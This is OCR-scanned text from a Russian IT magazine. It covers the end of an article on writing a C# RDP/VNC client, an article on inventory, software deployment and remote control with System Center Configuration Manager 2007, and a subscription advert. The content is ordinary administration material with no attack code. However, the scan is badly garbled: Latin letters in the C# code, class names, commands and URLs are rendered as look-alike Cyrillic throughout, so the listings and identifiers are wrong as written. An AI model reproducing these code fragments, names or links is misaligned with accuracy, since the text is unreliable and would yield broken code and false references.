а если не получится, не отчаивайся. Послетого, как мы разберем по 
косточкам работу с ѴІ\І С, ты сможешь сделать обработку экспеш нов по 
аналогии. 

Итак, разбор практики ВОР можно считать оконченным. В принципе, 
уже можно переходить к рассмотрению ѴІЧС, но сначала мне бы хотелось 
рассказать еще об одном около-гбр’шном нюансе. 

Те, кто юза ет стандартный РОР-клиент, наверняка, привыкли создавать 
ярлыки (правильнее сказать, файлы настроек] для быстрого подключе- 
ния к нужному серверу. У меня таких ярлыков штук 13. Пользоваться ими 
удобно — кликнул и подключился к нужному серверу. Но вот при пере- 
ходе на свой собственный клиентя испытал реальныетрудности — либо 
вбивать в свою прогу параметры подключения для всех этих 13 машин 
самостоятельно, либо предусмотреть возможность импорта настроек из 
сохраненных файлов. Первый вариантне особо привлекал, поэтому я 
сразу решил заняться реализацией второго. Сначала я думал, что будет 
много сложностей, но, какоказалось, любители С#уже проделали рабо- 
ту вместо меня и запечатлели свои труды в классе ВОРРіІеВеасІег. 

Этот класс позволяет как читать файлы настроек, так и создавать новые. 
Воспользовавшись им, ты сделаешь свою программу универсальной. 
Все старые файлы настроек можно импортировать, а если необходима 
передача параметров соединения кому-либо из пользователей — пред- 
усмотреть экспорт. Причем производитьэкспорт именно встандартный 
файл настроек, который без проблем поймет встроенный в ѴѴіпсІоѵѵз 
гбр-клиент. Все, не будутебя томить, взгляни лучше на пример чтения 
произвольного файла настроек: 

ОрепРіІеБіаІод туОрепРіІеБіаІод; 
туОрепРіІеБіаІод = пеѵѵ ОрепРіІеБіаІод ( ) ; 
туОрепРіІеБіаІод . РіІБег = " КБР Рііе I * . гбр" ; 
туОрепРіІеБіаІод . ТіБІе = "Выбор файла с настройками КБР" ; 
туОрепРіІеБіаІод . ЗЬоѵѵБіаІод ( ) ; 

іі (туОрепРіІеБіаІод . РіІеБатез . СоипБ ( ) >0) { 

КБРРіІе МуКбрРіІе = пехѵ КБРРііе ( ) ; 

МуКбрРіІе . Кеаб (туОрепРіІеБіаІод . РіІеБате) ; 
//Обработка свойств объекта МуКбрРіІе 

} 



• АибіоМобе — режим аудио 

• Ботаіп — домен 

• РиІІАббгезз — адрес сервера 

• Раззхлгагб — пароль 

• КебігесБСотРогДз — переопределять Сот-порты 

• Бзегпаше — имя пользователя 

• БезкборНеідЪЪ — высота рабочего стола 

• БезккорШібкЪ. — ширина рабочего стола 

• и т . д . 

ѴІМС 

Сделать поддержку ѴЫС несколько сложнее. Протокол создан не в не- 
драх МБ, а, следовательно, весь кодингложится сугубо на твои плечи. 

Не стоит раньше времени переживать и думать, что протокол придется 
описывать с нуля. Уже создано немало различных клиентов (втом числе 
и ОрепБоигсе], в которых можно подсмотреть код и перенести его на 
нужный нам язык программирования. 

Народные умельцы уже проработали вопроси оформили результат в 
виде компонента для моего любимого С#. Все, что от нас требуется — 
подключить его к Ѵізиа 1 5іи сі іо и написать несколько нехитрых строчек 
кода. 

Итак, отправляйся на ЬирУ/ссІоЕзепесас.оп.са/ргоіесІз/ѵпсзЬагр и 

сливай последнюю версию компонента. Он доступен как в исходных 
текстах, так и в виде готовой библиотеки сИА. Мне больше нравится ра- 
ботать с исходниками, поскольку при необходимости утебя всегда будет 
возможность внести изменения. Мой выбор — это архив с исходником и 
самостоятельная компиляция. 

Если ты тоже отдал предпочтению архиву с исходными текстами, то 
открывай сорцы в Ѵізиаі Біисііо и приступай к компиляции. У меня она 
прошла без ошибок. Искать дополнительные библиотеки не пришлось. 
Если утебя также все ОК, то на выходе ты должен получить библиотеку с 
именем ѴпсБЬагр.сШ. 

Закрывай в студии открытые ранее сорцы компонента ѴпсБЬагр и 
создавай новый проект типа ѴѴіпсІоѵѵз Еогтз Арріісабоп. Сейчас мы 
подключим скомпилированный ранее компонент. Для этого выполни 
несколько простых шагов: 

1. Открой панельэлементов и кликни на ней правой кнопкой мыши. 

2. В контекстном меню выбери пункт«Выбрать элементы/сбоозе 
еіетепіз». 

3. В появившемся окне клацни по кнопке «Обзор» и выбери получив- 
шуюся в результате компиляции библиотеку. 

4. Кликай Ок, а затем найди на панели элементов новый компонент 
ВетоІеОезкІор и кинь его на форму. 
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Считай, что после установки компонента на форму полдела уже сде- 
лано. Остается лишь заполнить пару полей и выполнить несколько 
методов. Для лучшей демонстрации работы с ѴІЧС я набросал не- 
большой проект. Его форму ты можешь увидеть на соответствующем 
рисунке. 

Для установки соединения с серверной частью ѴІЧСтебе необходимо вы- 
полнить метод Соппесі: компонента НетоІеОезкІор. Метод описан так: 

Ѵоісі Соппеск (зкгіпд Ъозк, Ъооі Ѵіеѵ\Юпіу, Ъооі зсаіесі) ; 

Принимаетон целыхтри параметра: 

• Ьозі — адресудаленного хоста. Можешьуказыватьздесьлибо ір- 
адрес, либо символьное имя. 

•ѵіеѵѵОпІу — режим отображения удаленного рабочего стола. Если пере- 
дать в этом параметре Ігие, то удаленный десктоп будет доступен лишь 
для просмотра. Все клики мышкой или нажатия клавиш на клавиатуре 
будут игнорироваться. 

• зсаіесі — масштабирование. Передаем Ігие — получаем масшабиро- 
ванное изображение. 

Код установки соединения из моего примера ты можешьувидеть на 
врезке. 

Код второй врезки прост до безобразия и вряд ли требует детальных 
пояснений. Все, что в нем происходит — заполнение необходимых 
полей и вызов метода СоппесС а также обработка эксепшн типа 
ѴпсРгоІосоІЕхсербоп. 

При удачном раскладе в компоненте НетоІеОезкІор отобразится 
содержимое удаленного рабочего стола. Внимательно посмотрев 
на листинг, ты, наверное, заметил, что в коде нигде не видно пере- 
дачи пароля. А ведь известно, что на подключение к серверной ча- 
сти можеттребоваться пасс. Тогда почему мы нигде не обрабатыва- 
ем эту ситуацию? Дело в том, что компонент берет эту обязанность 
на себя. В случае если требуется ввод пассворда, он автоматически 
сгенерирует окно запроса пароля. Не устраивает такой подход? 

Не проблема! Объяви функцию, которая будет возвращать пароль 
(можешь даже организовать хранилище паролей в базе данных] и 
передавать его в свойство СеіРаззѵѵогсІ объекта НетоІеОезкІор 
(смотри исходник]. 

Так, подключаться мы научились. Теперь рассмотрим самый послед- 
ний момент работы с ѴІЧС и двинемся дальше. При администрирова- 
нии удаленных систем периодически нам требуется послать сочета- 
ние нескольких клавиш. Типичный пример — <СМ+ АН: + ОеІ>. Если 
попробовать ихтупо нажать, хорошего ничего не произойдет. Все, 
что ты увидишь — запуск на локальном компьютере таек менеджера. 
Исправить положение дел поможет метод 5епсІ5ресіа ІКеузО . Его 
описание выглядиттак: 

ѵоісі ЗепсіЗресіаІКеуз ( ЗресіаІКеуз кеуз, Ъооі геіеазе) ; 



Метод принимает аждва параметра: 

• кеуз — значение из перечисления типа ЗресіаІКеуз. В качестве значе- 
ний могут быть: 

• Аік 

• АІкР4 

• Скгі 

• СкгІАІкБеІ 

• СкгІЕзс 

• геаіезе — освобождать клавишу или нет. 

Получается, что для отправки сочетания трех клавиш от всех бед тебе 
требуется выполнить всего одну строчку кода: 

КетокеБезскорІ . ЗепсіЗресіаІКеуз ( 

ЗресіаІКеуз . СкгІАІкБеІ ) ; 

На этом знакомство с компонентом для работы с ѴІЧС можно считать 
оконченным. Хочу обратить внимание нато, чтоя рассмотрел не все ме- 
тоды компонента ВетоІеОезкІор. Те, что осталисьза кадром — доступны 
во врезке. 

ДЕЛАЕМ ЗАКЛАДКИ 

Работать с обоими протоколами мы научились каквтеории.таки на 
практике. Остается посмотреть на процесс создания табов для каждого 
удаленного рабочего стола. 

Какты уже мог догадаться, все новые табы должны создаваться во 
время работы приложения (ВипТіте). Код создания очередной вкладки 
будет выглядеть примернотак: 

ТаЪРаде ЫемРаде = печл ТаЪРаде ( ) ; 

ЫеѵтРаде . Техк = "Новая вкладка"; 

КетокеБезккор БемКетокеБезскор = пем КетокеБезккор ( ) ; 
ЫетлРаде . Сопкгоіз . Аскі (БеѵіКетокеБезскор) ; 
каЪСопкгоІІ . ТаЪРадез . Асісі (БеѵіРаде) ; 

Лучше сохранять ссылку на вновь созданную вкладку в каком- 
нибудь контейнере. Потом будет намного удобней работать с боль- 
шим количеством табов (например, выполнять поиск, сортировку 

ИТ.Д.І. 

РАБОТА ОКОНЧЕНА! 

Для сегодняшнего примера мы выбрали С#, хотя могли писать и на іаѵа, 
или на приплюснутом Си, но в этом случаетак быстро создать рабочее 
приложение нам бы неудалось. Удачи тебе в кодинге, возникнут вопро- 
сы — пиши на мыло, постараюсь помочь! зс 
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Г. сеГг^ Сепіег Сй ^ ига1іст Мапазег 2007 



5у$іет Сйпійг Салй ^игаііал Мап^ег 2007 



5у$іет Сйпійг СйгЛд-игаІійгі Мападег 2007 



Оружие массового 
управления 

Оптимизируем работу ІТ-инфраструктуры 
компании с помощью 5ССМ 2007 

Бузует Сепіег Сопіідигаііоп Мападег2007 обладает рядом полезных 
возможностей, позволяющих на порядокупростить жизнь ІТ-шнику. 
Сегодня рассмотрим самые интересные из них: научимся производить 
инвентаризацию аппаратных комплектующих и установленных про- 
грамм, выполнять массовое развертывание приложений и удаленно 
управлять компьютерами сети. 



ДЕТАЛЬНЫЙ УЧЕТ КОМПЛЕКТУЮЩИХ 

И ПО Инвентаризация подчиненных компов 

— одна из ключевых функций 5ССМ, кото- 
рая позволяет иметь под рукой актуальную 
информацию о состоянии компьютерного 
парка (тип процессора, количество ОЗУ, 
диски, периферия, ОС, установленные 
приложения и т.д.), а также полную историю 
изменений. На основе собранных дан- 
ных очень просто создавать коллекции, 
например, отобрать только системы с 
определенным объемом ОЗУ. Напомню, что 
под коллекцией в 5ССМ понимается группа 
объектов (компьютеры, пользователи, ОС), 
объединенная по некоторому признаку 
(версия, значение, принадлежность к группе 
или типу т.п.) После установки в 5ССМ уже 
есть несколько коллекций, где объединены 
системы в зависимости от установленной 
версии ОС. Доступно большое количество 
готовых отчетов, они дадут ответ практичес- 
ки на любой вопрос по текущему состоянию 
серверов и рабочих станций (начальство 
будет в восторге) . 

Все возможности по сбору данных реализо- 
ваны в агентах аппаратной и программной 
инвентаризации, которые должны быть ак- 
тивированы во время установки системы. 
Агенты собирают информацию с клиентских 
компьютеров, опрашивая разные источники 

— реестр и классы ѴѴМІ (может сообщать до 
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1500 свойств оборудования). Просмотреть 
текущее состояние агентов и настроить их 
работу можно, перейдя в «Параметры сай- 
та — Агенты клиента» (5пе Зетп^з — Сііепі: 
А^епщ). Дважды щелкаем по ярлыку нуж- 
ного агента, убеждаемся, что активирован 
флажок «Включить инвентаризацию ...», и 
указываем расписание. По умолчанию ин- 
вентаризация производится раз в неделю; в 
зависимости от конкретных условий, можно 
уменьшить или увеличить этот интервал. 
В агенте аппаратной инвентаризации так- 
же присутствует вкладка «Коллекция МІР- 
файлов», — такие файлы используются для 
расширения возможностей агента. Правда, 
админы со стажем активировать ее не реко- 
мендуют, так как в этом случае 5ССМ будет 
получать непроверенные данные, а значит, 
есть риск нарушения безопасности. 

В настройках агента программной инвента- 
ризации чуть больше пунктов. Так, во вклад- 
ке «Сбор данных инвентаризации» (Іпѵепногу 
Соііесіііоп) указываются расширения файлов 
и детализация отчетов (сведения о файле, 
продукте). По умолчанию на удаленной сис- 
теме производится поиск исполняемых ехе- 
файлов на всех жестких дисках компьютера, 
исключение составляют лишь зашифрован- 
ные и сжатые файлы. При необходимости 
легко добавить любой другой тип файла и 
критерии поиска. Во вкладке «Сбор файлов» 



(Рііе Соііесіііоп) указываются типы файлов, 
которые будут скопированы на сервер. Акти- 
вировать этот параметр нужно осторожно и 
только в том случае, если это действительно 
необходимо, так как передача файлов может 
генерировать большой трафик. Во вкладке 
«Инвентарные имена» (Іпѵепіюгу Ыатез) 
задаются названия продуктов. Назначение 
у нее очень простое. Например, в разных 
программах может быть записан один про- 
изводитель, но со своими сокращениями 
— Місгозоіт, Місгозоіі Согр. и т.д. В отчетах 
это будут разные организации, что создает 
неудобства. Вот в этой вкладке и можно за- 
дать единое имя для отчетов. На клиентской 
системе настройки агента доступны в «Па- 
нели управления», где после его установки 
создается новый пункт «Диспетчер конфи- 
гурации» (СопН^игапоп Мапа^ег). Настроек 
немного. Так, перейдя во вкладку «Действия» 
(Асгіопз), можно вручную инициировать ту 
или иную процедуру, например инвентари- 
зации софта. 

Собранную агентами информацию (теку- 
щую и историю) можно просмотреть с по- 
мощью «Обозревателя ресурсов» (Кезоигсе 
Ехріогег). Он запускается из контекстного 
меню «Запустить — Обозреватель ресурсов», 
вызываемого по щелчку на выбранной сис- 
теме в меню «Коллекции», или из командной 
строки (гезоигсеехріогег.тзс). Обозреватель 
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содержит три основных вкладки, назначение которых понятно из таризации — «Контроль использования программных продуктов», 
названия: «Оборудование», «Журнал оборудования», «Программное Она позволяет проводить наблюдение и собирать данные о про- 
обеспечение». Просто отмечаем нужный пункт и получаем данные. граммах, установленных на клиентах. Сбор данных производится 

В 5ССМ реализовано большое количество отчетов. Все они доступны на основе правил, задаваемых администратором, после получения 
из одноименной вкладки, находящейся в «Управление компьюте- от агентов информации. На их основе можно создавать коллекции и 
ром». Для удобства выбора отчеты можно отсортировать по столбцу получать различные отчеты. Например, админ легко может узнать, 
«Категории». Теперь выбираем любой подходящий шаблон отчета, сколько копий определенной программы установлено на клиентских 
Например, можно выбрать «Компьютеры с определенными видеоа- системах, 
даптерами» или «Компьютеры с недостаточным свободным местом 

на дисках». Чтобы сформировать отчет, следует выбрать в контекс- УПРАВЛЕНИЕ ТРЕБУЕМОЙ КОНФИГУРАЦИЕЙ «Управление требу- 
тном меню пункт «Запустить», после чего в ІЕ откроется страничка с емой конфигурацией» (Эезігесі СопН^игагіоп) — очередная ннтерес- 
полным раскладом. Если в меню такой пункт отсутствует, вероятно, ная возможность 5ССМ. Эта функция позволяет оценить соответс- 
роль сайта «Точка формирования отчетов» не установлена. Чтобы твие парка систем ряду условий, которые задает администратор 
просмотреть список ролей и активировать нужные, переходим в «Па- — аппаратная часть, версия ОС, наличие обновлений и сервис-па- 
раметры сайта — Системы сайта» и выбираем в списке сайт. В окне ков, параметры защиты, установленные приложения (и правильно 
консоли будут показаны все роли, которые выполняетсайт.Длядобав- ли они сконфигурированы), настройки реестра, наличие файлов и 
ления роли используем ссылку «Новая роль» и в окне мастера просто каталогов и т.д. В терминологии 5ССМ такие составляющие, по ко- 
отмечаем ее флажком. Возможности инвентаризации оборудования торым производится проверка, называются «Элементами конфи- 
и ПО расширяет функция «Аналитики активов» (Аззеі: Іпііеііі^епсе) гурации» (СопЯ^игагіоп Йетз). Сверка производится с шаблонным 
(ранее — «Управление ресурсами»), призванная упростить управле- показателем конфигурации («Базовые показатели конфигурации», 
ние лицензиями и используемым ПО. После ее активации увеличива- Сопіі^іігаіііоп Вазеііпе), который состоит из элементов и может быть 
ется диапазон собираемых данных, за счет чего получаем более 50-ти создан с эталонной системы, получен от поставщика ПО или дру- 
новых связанных между собой отчетов. того ресурса в интернете. К примеру, по адресу го.тісгозоід.сот/ 

Ранее для включения «Аналитики активов» нужно было править файл 1ѵѵ1іпк/?ІлпкІсІ = 71837 находится архив с бесплатными шаблонами. 
5М5_сіе1.то1. Начиная с 8Р1, эта функция активируется из консоли Применив шаблон, клиент, сверившись с набором показателей, от- 
5ССМ. После выбора в контекстном меню пункта «Включить анали- правляет на сайт 5ССМ отчет. В результате , администратор может 
тику активов» появится запрос на включение дополнительных клас- узнать, какой из компонентов системы не соответствует требуемой 
сов отчетов инвентаризации. Необходимо задать хотя бы один из них. конфигурации. 

Подробную информацию о доступных классах можно почерпнуть в до- Зачем это может понадобиться? Например, нужно развернуть на 
кументации ТесЬПеі: (щсЬпеСтісго50ІЕсот/гіі-ги/1іЬгагѵ/сс161933. рабочих станциях новое ПО, к которому разработчики предъявляют 
азрх) . Например, 5М5_Аиш5тгі:5о1і:ѵѵш-е отслеживает все програм- жесткие требования. Администратор создает Вазеііпе и применяет 
мы, запускающиеся вместе с ОС. его к определенной коллекции. Мы получаем четкое представление. 

Собранные данные можно просмотреть в подменю «Отчеты аналити- на каких системах можно развернуть программу, а на каких нет, и что 
ки активов» и в меню «Отчеты». именно и насколько не соответствует «норме». 

Еще одна функция, которая расширяет возможности агентов инвен- НастройкашаблонаЭезігесіСопІі^игаіііоппроизводитсяводноимен- 
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АКТИВИРУЕМ АГЕНТА ИНВЕНТАРИЗАЦИИ ОБОРУДОВАНИЯ 



лІЬі 



1 НТТР://ѴѴѴт1 



т 

> Ііпкз 



• Подробнее о 
ЭезігесІ Сопйдигайоп 
можно узнать в 
ТесЬЫеІ: — Іесбпеі. 
тісгозоЙ.сот/ги-ги/ 
Іі Ь га гѵ/ЬЬ680553. 
азрх . 



• Рекомендации 
по автоматической 
установке программ 

— ІесЬпеГтісгозоІІ. 
сот/ги-ги/Шэга гу/ 
ЬЬ693561 .азрх . 



ном подменю в разделе «Управление компьютером» 
(Сотрілег Мапа^етепи) . Здесь две ветки — «Элементы 
конфигурации» и «Базовые показатели конфигурации». 
Вначале необходимо создать элементы. Переходим в 
«Элементы конфигурации», где нажимаем ссылку для 
создания нового документа и выбираем один из подпун- 
ктов в соответствии с задачами — Арріісагіопз («При- 
ложения»), Сепегаі («Общая»), Орегагіп^ Зузгет («ОС»). 
После выбора любого пункта появится мастер настрой- 
ки. Для примера выберем «Элемент конфигурации 
приложения». Вводим название и описание элемента. 
Нажав кнопку «Категория», можно назначить метку для 
упрощения отбора и поиска при большом количестве 
элементов. Указываем объекты и параметры, включа- 
емые в элемент конфигурации. После этого отмечаем 
версии ОС, к которым можно применить эти элементы 
конфигурации, и при необходимости активируем фла- 
жок внизу окна «Это приложение работает только на 64- 
разрядных компьютерах». Просматриваем настройки 
еще раз и выполняем их. Настройки в двух остальных 
пунктах производятся по аналогии. Если есть подготов- 
ленный пакет настройки рекомендаций, поставляемый 
в формате саЬ (файл тзі следует сначала установить), 
его можно импортировать, выбрав пункт «Импорт кон- 
фигурационных данных». Затем при помощи мастера 
просто указываем на расположение саЬ-файла и нажи- 
маем кнопку «Готово». Чтобы просмотреть или изме- 
нить настройки, выбираем элемент; кроме этого, будут 
доступны пункты, позволяющие создать дочерний эле- 
мент (копию), просмотреть ХМБ-представление, изме- 
нить категорию и переместить элементы. 

Теперь переходим в «Базовые показатели конфигура- 
ции», где выбираем ссылку «Новые базовые показатели 
конфигурации». На первом шаге заполняем название и 
описание, выбираем категорию. Второй шаг является 
основным. Здесь, нажимая ссылки, указываем условия 
сравнения, состоящие из созданных ранее элементов 
конфигурации. Условия разбиты на подгруппы: ОС, при- 
ложения и общие настройки, обновления и различные их 
комбинации. Отметив все, что необходимо, нажимаем 
«Готово». Осталось применить созданную конфигура- 
цию на одну из коллекций : отмечаем Вазеііпе и выбираем 
ссылку «Назначить к коллекции» (Аззі^п ю а Соііесгіоп) . 




П0СЛЕУСТАН0ВКИ АГЕНТА НА КЛИЕНТ- 
СКУЮ СИСТЕМУ ЕГО НАСТРОЙКИ ДОСТУПНЫ 
В «ПАНЕЛИ УПРАВЛЕНИЯ» 



Появится очередной мастер. Выбираем нужные Вазеііпе 
и затем в списке коллекцию, к которой будем назначать. 
Заключительный этап: задаем расписание и нажимаем 
«Готово». Через некоторое время в окне «Управление тре- 
буемой конфигурацией» начнут появляться отчеты. 
Настройки агента Эезігеб Сопй^игаиоп можно про- 
смотреть в «Агенты клиента — Агент клиента управле- 
ния требуемой конфигурацией» (Эезігесі СопЯ^игагіоп 
Мапа^етепі: СНепи А^епі:) . В свойствах всего одна вклад- 
ка, где можно активировать/деактивировать эту функ- 
цию и установить расписание. По умолчанию проверка 
производится раз в неделю. 

Подробнее о Эезігесі СопЯ^игагіоп можно узнать в доку- 
ментах ТесІШеІ ПесЬпеГтісгозоГгсот/гіі-гіі/ІіЪгагѵ/ 
ЪЪбЭОББЗ.азрх) . 



ЦЕНТРАЛИЗОВАННАЯ УСТАНОВКА ПРИЛОЖЕНИЙ Бла- 
годаря заранее подготовленным пакетам и интуитивным 
средствам удаленного развертывания 5ССМ, массовая 
установка клиентских программ осуществляется в счи- 
танные минуты. Это позволит существенно снизить на- 
грузку на ІТ-отдел. Рассмотрим сценарий подробнее. 
Перед началом развертывания программы следует 
создать пакет, который будет содержать все необ- 
ходимое для установки на удаленной системе, в том 
числе и сам дистрибутив программы. Для этого пере- 
ходим в «Управление компьютером — Распростране- 
ние программного обеспечения — Пакеты» (Боітѵѵаге 
ЭізигіЪиіііоп — Раскате). В появившемся окне пусто, 
так как готовых пакетов мы еще не создали. Нажимаем 
ссылку «Новый документ» и выбираем из списка Пакет. 
На первом шаге мастера заполняем свойства пакета 
(название, версия, производитель, описание). Реко- 
мендуется указывать все поля, — упрощает поиск и об- 
новление. На следующем шаге при помощи файлового 
менеджера отмечаем каталог, в котором расположен 
дистрибутив программы. Это может быть сетевая пап- 
ка или локальный диск. Дополнительные параметры 
позволяют изменить расписание для точек обновле- 
ния, разрешить хранить пакет в клиентском кэше, а 
также задать использование разностной репликации. 
Дальнейшие шаги (доступ к папке распространения, 
параметры распространения (приоритет, распростра- 
нитель), отчеты и права доступа) можно пропустить, 
оставив значения по умолчанию, для чего просто на- 
жимаем «Готово». 
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5у$іет Сел Іег Сйгѵйдідгаііол Мэпадег 2007 



5у$іет Селіег СйпАдигаііап Мэггадег 2007 



$у$іет Селіег СйгЛдвигаііоп Мэгщдег 2007 



5у$іет Селіег СолЛоигаЮса Мэпадег 2007 




Созданный пакет становится доступным как поддерево 
меню «Пакеты». Если его развернуть, получим доступ 
к нескольким подпунктам: «Учетные записи доступа», 
«Точки распространения», «Программы», «Состояния 
пакета». Хотя пакет уже содержит все файлы и сведения, 
необходимые для применения на клиентских компьюте- 
рах, сам способ использования приложения определя- 
ется программой. В программе описаны действия, вы- 
полняемые на клиенте после получения пакета. Каждый 
пакет должен содержать, как минимум, одну программу, 
но администратор может создать любое количество про- 
грамм для пакета (например, для установки пакета в раз- 
ных ОС). Выбираем подпункт «Программы», нажимаем 
«Новый документ Программа». Появляется очередной 
мастер, заполняем все предложенные поля (имя, ком- 
ментарий, режим запуска, действие после выполнения 
и т.д.) . Особое внимание удели пункту «Командная стро- 
ка», ведь в большинстве случаев установка должна про- 
ходить в тихом режиме, без вмешательства пользовате- 
ля. Здесь все зависит от особенностей устанавливаемой 
программы. Например, если установка производится 
при помощи тзіехес, можно вписать так: 




АКТИВАЦИЯ ФУНКЦИИ «АНАЛИТИКА АКТИВОВ» ДОБАВИТ 
ЕЩЕ БОЛЕЕ 50 -ТИ ОТЧЕТОВ 



шзіехес /I іпзСаІІ.тзі /диіеС /дп 



запуск после входа пользователя в систему, или пока ник- 
Для сложных программ понадобится создать файл отве- то не зарегистрирован. Задаем права, с которыми будет 
тов. Некоторые рекомендации по автоматической уста- запущена программа: текущий пользователь либо адми- 
новке можно найти в документе ЕесЬпен.тісгозоГи.сот/ нистратор. Если выбран первый вариант, пользователь 
ш-ги/НЬгагѵ/ЬЬ693561.а5рх . на удаленной системе может влиять на процесс установ- 

Следующий шаг мастера позволяет указать требования ки. В поле «Режим диска» (Эгіѵе тобе) указываем метод 
к системе — наличие свободного места на диске, макси- доступа к точке распространения программы: ІШС-путь 
мальное время выполнения, поддерживаемые платфор- или подключение сетевого диска. Шаг «Дополнительно» 
мы. Далее отмечаем условия для запуска. Это может быть позволяет задать дополнительные критерии для запуска 

ОБОРУДОВАНИЕ И УСТАНОВЛЕННОЕ ПО ОТДЕЛЬНОЙ МАШИНЫ МОЖНОУЗНАТЬ 
ПРИ ПОМОЩИ ВЕ501ІКСЕ ЕХРЮКЕК 





> іпіо 

• Внедрение 5ССМ 
2007 позволит ІТ- 
отделам сократить 
время на обслужива- 
ние новых приложе- 
ний, рабочих станций 
и серверов. 

• Подробнее об 
ѴѴ05 читай в статье 
«Ставим ѴѴіпбоѵѵз по 
сети», опубликован- 
ной в июньском номе- 
ре ц за 2007 год. 

• Как использовать 
ѴѴАІКдля создания 
ѴѴІМ-образов, читай 
в статье «Самосбор- 
ные окна» в январс- 
ком номере т за 2009 
год. 

• Обзор возмож- 
ностей 5ССМ 2007, 
установка сайта и 
распространение 
агентов смотри в 
статье «Начальник 
сети» в августовском 
номере т за 2009 
год. 
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5ѴЫХАСК 




МАСТЕР СОЗДАНИЯ ПАКЕТА ДЛЯ ЦЕНТРАЛИЗОВАН- 
НОЙ УСТАНОВКИ ПРИЛОЖЕНИЙ 




ОДИН ИЗ ВИДОВ ОТЧЕТОВ О РАСПРОСТРАНЕНИИ ПО 



программы. Например, для работы одной программы требуется, что- 
бы в системе была установлена другая программа или библиотека. 
Вот здесь и отмечаем, что нужно проверить и при необходимости 
установить. Дополнительные флажки позволяют отключить уведом- 
ления программы; флажок «ЭізаЫе гіііз рго^гат оп сотрілегз ѵѵѣеге 
п І5 асіѵегнізесі» скроет программу из оснастки «Установка и удаление 
программ». Затем можем указать файл и код установщика ѴѴіпсІоѵѵз 
(СІЛБ), который является главным идентификатором приложения 
(предназначен для установки/удаления с помощью тзі) . Нажимаем 
«Готово», — программа создана. Можно вызвать окно свойств и изме- 
нить основные настройки приложения. 

Для хранения исходных файлов используются точки распростране- 
ния, которым и нужно отправить новый пакет. Переходим в меню 
«Управление точками распространения». Таккак пока ни одной точки 
у нас нет, выбираем в контекстном меню «Новые точки распростра- 
нения» и действуем по подсказкам мастера. Собственно, основной 
шаг один — «Копирование пакета», в котором следует отметить наш 
5ССМ-сайт. После копирования пакета получаем отчет. Теперь нуж- 
но сделать так, чтобы клиенты на удаленных системах узнали о новой 
программе. Через контекстное меню, вызываемое при щелчке по на- 
шей программе, выбираем пункт «Распространение -> Программное 
обеспечение» (ЭізігіЪиіе -> Боітѵѵаге) . Запустившийся мастер рас- 
пространения пакетов снова предложит отметить точки распростра- 
нения. Далее достаточно убедиться, что мы выбрали именно ту про- 
грамму, и что активирован параметр, разрешающий ее объявление. 
Наконец, выбираем или создаем коллекцию, для которой нужно объ- 
явить о программе, указываем описание и вложенную коллекцию. 
При выборе расписания объявления указывается дата, с которой 
должна быть доступна программа, и опционально срок окончания 
распространения программы. Этап назначения программы позво- 
ляет сделать ее обязательной. Здесь можно указать дату, когда бу- 
дет производиться обязательная установка, и такие параметры, как 
включение хостов по ѴѴакеОпБап, разрешение перезапуска системы, 
игнорирование окон обслуживания. Через некоторое время клиент 
скачает программу и начнет установку. В зависимости от настроек, 
пользователь получает предупреждение в виде значка и Рор-ир сооб- 
щения о доступности новой программы. Если щелкнуть по значку, 
появится окно «Запуск объявленных программ»; в нем будет доступ- 
на информация по программе. Если установку должен производить 
пользователь, ему достаточно будет нажать кнопку «Запустить». 
Результаты по последним 10 объявлениям программ доступны в виде 
сводных графиков в окне «Распространение программного обеспе- 
чения». Более подробно работу системы установки программ можно 



просмотреть в отчетах, где содержится более 20 объявлений в четы- 
рех категориях: «Объявления», «Состояние объявления», «Пакеты» 
и «Коллекции». 

УДАЛЕННОЕ УПРАВЛЕНИЕ При наличии соответствующих прав до- 
ступа функция удаленных средств позволяет подключаться и управлять 
удаленной системой для решения возникших проблем — устранения 
неполадок и помощи пользователям. То есть, 5ССМ способен заме- 
нить привычный Кабтіп. Чтобы такая возможность была доступна, на 
клиентской системе должен быть активен «Агент клиента удаленных 
средств» (КетоГеТооНСНетА^еп!:) . В основе агента лежит используемая 
в Ѵізііа технология совместной работы, работающая по протоколу КНР. 
Агент поддерживает три уровня доступа: нет доступа, только просмотр 
(отсутствует в агенте для ѴѴіп2к) и полный доступ. Не поддерживаются 
функции перезагрузки, передачи файлов, удаленное выполнение. 

В окне настроек удаленных средств доступны параметры, позволя- 
ющие: указать степень доступа для агентов в разных ОС; настроить 
вывод запроса пользователю, при попытке админа обратиться к кли- 
енту; задать уведомление (сообщение, звуковой сигнал), выдаваемое 
при удаленном подключении. Чтобы иметь возможность удаленно- 
го управления клиентским компьютером, обязательно указываем 
учетные записи, используемые для доступа, в списке «Разрешенные 
наблюдатели» (вкладка «Безопасность»). Теперь, чтобы подключить- 
ся к удаленной системе, выбираем клиентский компьютер в разделе 
«Коллекции» и щелкаем в контекстном меню «Запустить Удаленное 
управление». 

На клиентский хост передаются все действия с мышью и нажатия кла- 
вишнаклавиатуре,заисключениемкомбинаций:<СТКЕ+АЕТ+ЭЕБ>, 
<СТКБ+Е5С>, <АБТ+ТАВ> и < АБТ + клавиша >. Чтобы их исполь- 
зовать, необходимо подключиться к системе через удаленный рабо- 
чий стол. В режиме помощника пользователь может управлять своей 
системой без ограничений. 

ГАЛОПОМ ПО ОТЧЕТАМ к сожалению, рамки журнальной статьи не 
позволяют рассмотреть эти и другие возможности 5ССМ более под- 
робно. Мы лишь галопом промчались по отчетам — весьма мощному 
и гибкому инструменту, позволяющему получить любую информа- 
цию по любой системе в сети. Ничего не сказано об обновлении ПО, 
развертывании ОС, защите доступа к сети, управлении мобильными 
устройствами, обеспечении безопасности и конфиденциальности 
в СопН^игагіоп Мапа^ег 2007. Ответы на эти вопросы можно найти 
самостоятельно, изучив документацию, поставляемую с 5ССМ и на 
сайте ТесЬНеи. ИНИ 
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подпишись 



Подписка - это: 

■ Выгода ■ Гарантия ■ Сервис 



\ллллл/.дІс.ги 



й 

00 

< 




автомобилей 



6 мес. 594, 00 руб. 
12мес. 1056,00 руб. 




ОЮРСПШ 




6 мес. 41 5, 80 руб. 

1 2 мес. 720, 00 руб. 

По спец, акции на сайте! 




оиохрЕРт 



б мес. 1 080, 00 руб. б мес. 653, 40 руб. 

12 мес. 1960,00 руб. 12 мес. 1188,00 руб. 




РУР 




6 мес. 1200, 00 руб. 
12 мес. 2200,00 руб. 




6 мес. 2400,00 руб. 6 мес. 1300,00 руб. 

12 мес. 4400,00 руб. 12 мес. 1188,00 руб. 

По спец акции на сайте! 



ё 

о 

е 



ОідііаІРНоЮ 




б мес. 950, 40 руб. 
12 мес. 1716,00 руб. 



сЬоилр 

МАСТЕРСКАЯ 



Г ' ш . е : А. * 

